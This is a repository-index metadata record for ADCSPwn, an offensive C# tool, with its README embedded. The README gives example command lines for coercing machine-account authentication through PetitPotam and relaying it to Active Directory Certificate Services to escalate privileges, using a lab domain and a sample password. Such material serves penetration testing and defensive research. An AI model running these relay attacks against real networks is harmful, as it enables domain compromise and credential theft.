{"id":13840982,"url":"https://github.com/bats3c/ADCSPwn","last_synced_at":"2025-07-11T10:30:36.960Z","repository":{"id":47948380,"uuid":"391104231","full_name":"bats3c/ADCSPwn","owner":"bats3c","description":"A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service.","archived":false,"fork":false,"pushed_at":"2023-03-20T20:30:40.000Z","size":6258,"stargazers_count":816,"open_issues_count":2,"forks_count":122,"subscribers_count":16,"default_branch":"master","last_synced_at":"2024-11-19T05:59:33.674Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/bats3c.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-07-30T15:04:41.000Z","updated_at":"2024-10-14T04:36:56.000Z","dependencies_parsed_at":"2024-05-07T00:45:54.771Z","dependency_job_id":null,"html_url":"https://github.com/bats3c/ADCSPwn","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bats3c%2FADCSPwn","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bats3c%2FADCSPwn/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bats3c%2FADCSPwn/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bats3c%2FADCSPwn/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/bats3c","download_url":"https://code
load.github.com/bats3c/ADCSPwn/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225712959,"owners_count":17512523,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:00.884Z","updated_at":"2024-11-21T10:31:11.112Z","avatar_url":"https://github.com/bats3c.png","language":"C#","readme":"# ADCSPwn\n\nA tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts (PetitPotam) and relaying to the certificate service.\n\n## Usage\n\nRun `ADCSPwn` on your target network.\n\n```\nAuthor: @_batsec_ - MDSec ActiveBreach\nContributor: @Flangvik -  TrustedSec\nContributor: @424f424f -  Black Hills Information Security\n\nadcspwn.exe --adcs \u003ccs server\u003e --port [local port] --remote [computer]\n\nRequired arguments:\nadcs            -       This is the address of the AD CS server which authentication will be relayed to.\n\nOptional arguments:\nsecure          -       Use HTTPS with the certificate service.\nport            -       The port ADCSPwn will listen on.\nremote          -       Remote machine to trigger authentication from.\nusername        -       Username for non-domain context.\npassword        -       Password for non-domain context.\ndc              -       Domain controller to query for Certificate Templates (LDAP).\nunc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .\noutput          -       Output path to store base64 generated crt.\n\nExample usage:\nadcspwn.exe --adcs 
cs.pwnlab.local\nadcspwn.exe --adcs cs.pwnlab.local --secure\nadcspwn.exe --adcs cs.pwnlab.local --port 9001\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\\Temp\\cert_b64.txt\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\\mranderson --password The0nly0ne! --dc dc.pwnlab.local\nadcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\\\WIN-WORK01.pwnlab.local\\made\\up\\share\n```\n\n## Credits\n\n- [@harmj0y](https://twitter.com/harmj0y) \u0026 [@tifkin_](https://twitter.com/tifkin_) for their [whitepaper](https://specterops.io/assets/resources/Certified_Pre-Owned.pdf) detailing this issue.\n- [@topotam77](https://twitter.com/topotam77) for showing how `EfsRpcOpenFileRaw` can be abused.\n","funding_links":[],"categories":["C# #"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbats3c%2FADCSPwn","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbats3c%2FADCSPwn","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbats3c%2FADCSPwn/lists"}